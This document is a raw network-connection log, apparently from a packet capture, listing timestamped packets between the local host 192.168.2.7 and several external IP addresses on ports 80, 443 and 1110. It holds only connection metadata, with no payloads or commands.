Jun 27, 2024 05:58:57.740917921 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.740926027 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.740936041 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.740943909 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.740952015 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.740978956 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.741108894 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.741236925 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.741249084 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.741260052 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.741275072 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.741281033 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.741292953 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.741303921 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.741311073 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.741321087 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.741328955 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.741365910 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742031097 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742043018 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742053986 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742069960 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742088079 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742141008 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742151976 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742162943 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742173910 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742186069 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742192984 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742204905 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742213964 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742223978 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742233038 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742242098 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742257118 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742261887 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742280960 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742295980 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742486000 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742496967 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742507935 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742518902 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742527008 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742542982 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742552042 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742563009 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742571115 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742579937 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742592096 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742602110 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742609978 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742621899 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742630959 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742640972 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742647886 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742656946 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742667913 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.742679119 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.742707014 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.743283033 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743294001 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743300915 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743346930 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.743424892 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743436098 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743447065 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743470907 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.743482113 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743493080 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743499994 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.743513107 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743520975 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.743531942 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743540049 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.743551016 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743557930 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.743567944 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743576050 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.743586063 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743592978 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.743602991 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.743609905 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.743634939 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.743644953 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.744365931 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744378090 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744388103 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744400024 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744410992 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744417906 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.744427919 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744438887 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744446993 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.744457006 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744467974 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744474888 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.744492054 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744498968 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.744508028 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744524002 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744529009 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.744538069 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744545937 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.744555950 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.744574070 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.744596958 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.745111942 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.745124102 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.745166063 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.745224953 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.745235920 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.745254040 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.745261908 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.745271921 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.745284081 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.745291948 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.745305061 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.745316982 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.745326042 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.745338917 CEST	80	49742	94.228.166.74	192.168.2.7
Jun 27, 2024 05:58:57.745345116 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.745366096 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.745381117 CEST	49742	80	192.168.2.7	94.228.166.74
Jun 27, 2024 05:58:57.763375044 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:57.763397932 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:57.764602900 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:57.764672995 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:57.766405106 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:57.808499098 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:57.964629889 CEST	443	49745	67.199.248.11	192.168.2.7
Jun 27, 2024 05:58:57.964695930 CEST	49745	443	192.168.2.7	67.199.248.11
Jun 27, 2024 05:58:57.966979980 CEST	49745	443	192.168.2.7	67.199.248.11
Jun 27, 2024 05:58:57.966988087 CEST	443	49745	67.199.248.11	192.168.2.7
Jun 27, 2024 05:58:57.967317104 CEST	443	49745	67.199.248.11	192.168.2.7
Jun 27, 2024 05:58:57.974606991 CEST	49745	443	192.168.2.7	67.199.248.11
Jun 27, 2024 05:58:58.016500950 CEST	443	49745	67.199.248.11	192.168.2.7
Jun 27, 2024 05:58:58.094811916 CEST	443	49745	67.199.248.11	192.168.2.7
Jun 27, 2024 05:58:58.094934940 CEST	443	49745	67.199.248.11	192.168.2.7
Jun 27, 2024 05:58:58.094995022 CEST	49745	443	192.168.2.7	67.199.248.11
Jun 27, 2024 05:58:58.101731062 CEST	49745	443	192.168.2.7	67.199.248.11
Jun 27, 2024 05:58:58.276314974 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.276432037 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.361656904 CEST	49747	443	192.168.2.7	54.67.42.145
Jun 27, 2024 05:58:58.361681938 CEST	443	49747	54.67.42.145	192.168.2.7
Jun 27, 2024 05:58:58.361752987 CEST	49747	443	192.168.2.7	54.67.42.145
Jun 27, 2024 05:58:58.362093925 CEST	49747	443	192.168.2.7	54.67.42.145
Jun 27, 2024 05:58:58.362109900 CEST	443	49747	54.67.42.145	192.168.2.7
Jun 27, 2024 05:58:58.416475058 CEST	49740	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:58.416786909 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:58.421628952 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:58.421650887 CEST	80	49740	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:58.421730995 CEST	49740	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:58.421749115 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:58.426568985 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:58.431571007 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:58.518908978 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.518934011 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.518978119 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.518990040 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.519009113 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.519011021 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.519032001 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.519037008 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.519053936 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.519067049 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.520381927 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.520458937 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.520469904 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.520503044 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.520508051 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.520548105 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.761626959 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.761652946 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.761713028 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.761718035 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.761740923 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.761776924 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.761797905 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.762938023 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.762979984 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.763008118 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.763016939 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.763040066 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.763067007 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.764023066 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.764067888 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.764092922 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.764097929 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.764126062 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.764148951 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.804752111 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.804800034 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.804828882 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:58.804833889 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:58.804876089 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.043775082 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.043798923 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.043842077 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.043876886 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.043884993 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.043911934 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.043934107 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.044231892 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.044279099 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.044290066 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.044318914 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.044334888 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.044358969 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.044946909 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.045001030 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.045021057 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.045034885 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.045063972 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.045073032 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.045728922 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.045773983 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.045789957 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.045794964 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.045840979 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.046731949 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.046777964 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.046809912 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.046814919 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.046840906 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.046861887 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.047709942 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.047755003 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.047799110 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.047804117 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.047848940 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.048562050 CEST	1110	49744	4.184.236.127	192.168.2.7
Jun 27, 2024 05:58:59.048629045 CEST	49744	1110	192.168.2.7	4.184.236.127
Jun 27, 2024 05:58:59.049010038 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.049057007 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.049092054 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.049103975 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.049145937 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.049160957 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.057018042 CEST	443	49747	54.67.42.145	192.168.2.7
Jun 27, 2024 05:58:59.057090044 CEST	49747	443	192.168.2.7	54.67.42.145
Jun 27, 2024 05:58:59.057964087 CEST	49744	1110	192.168.2.7	4.184.236.127
Jun 27, 2024 05:58:59.080336094 CEST	49747	443	192.168.2.7	54.67.42.145
Jun 27, 2024 05:58:59.080347061 CEST	443	49747	54.67.42.145	192.168.2.7
Jun 27, 2024 05:58:59.081378937 CEST	443	49747	54.67.42.145	192.168.2.7
Jun 27, 2024 05:58:59.082232952 CEST	49747	443	192.168.2.7	54.67.42.145
Jun 27, 2024 05:58:59.095519066 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.095562935 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.095877886 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.095885038 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.095928907 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.103020906 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.103254080 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.124536991 CEST	443	49747	54.67.42.145	192.168.2.7
Jun 27, 2024 05:58:59.169019938 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.175182104 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.247380018 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.247430086 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.247457027 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.247462988 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.247492075 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.247514963 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.248147964 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.248205900 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.248205900 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.248231888 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.248259068 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.248281002 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.249048948 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.249109983 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.249119997 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.249142885 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.249170065 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.249191046 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.249735117 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.249779940 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.249813080 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.249819040 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.249830008 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.249835968 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.249856949 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.250617981 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.250659943 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.250684023 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.250689983 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.250716925 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.250735998 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.251377106 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.251451015 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.251467943 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.251473904 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.251512051 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.251529932 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.251533031 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.251621962 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.251668930 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.275798082 CEST	49743	443	192.168.2.7	103.28.36.182
Jun 27, 2024 05:58:59.275808096 CEST	443	49743	103.28.36.182	192.168.2.7
Jun 27, 2024 05:58:59.284203053 CEST	443	49747	54.67.42.145	192.168.2.7
Jun 27, 2024 05:58:59.284364939 CEST	443	49747	54.67.42.145	192.168.2.7
Jun 27, 2024 05:58:59.284420013 CEST	49747	443	192.168.2.7	54.67.42.145
Jun 27, 2024 05:58:59.309021950 CEST	49747	443	192.168.2.7	54.67.42.145
Jun 27, 2024 05:58:59.442696095 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.442783117 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.442797899 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.442819118 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.442832947 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.442847013 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.442852020 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.442862034 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.442876101 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.442877054 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.442890882 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.442892075 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.442914963 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.442914963 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.442931890 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.442935944 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.442955971 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.442975044 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.448589087 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.448611975 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.448626995 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.448674917 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.448699951 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.663691044 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.663736105 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.664302111 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.664359093 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.664371967 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.664407969 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.664441109 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:59.664470911 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:59.664494991 CEST	80	49748	77.91.77.81	192.168.2.7
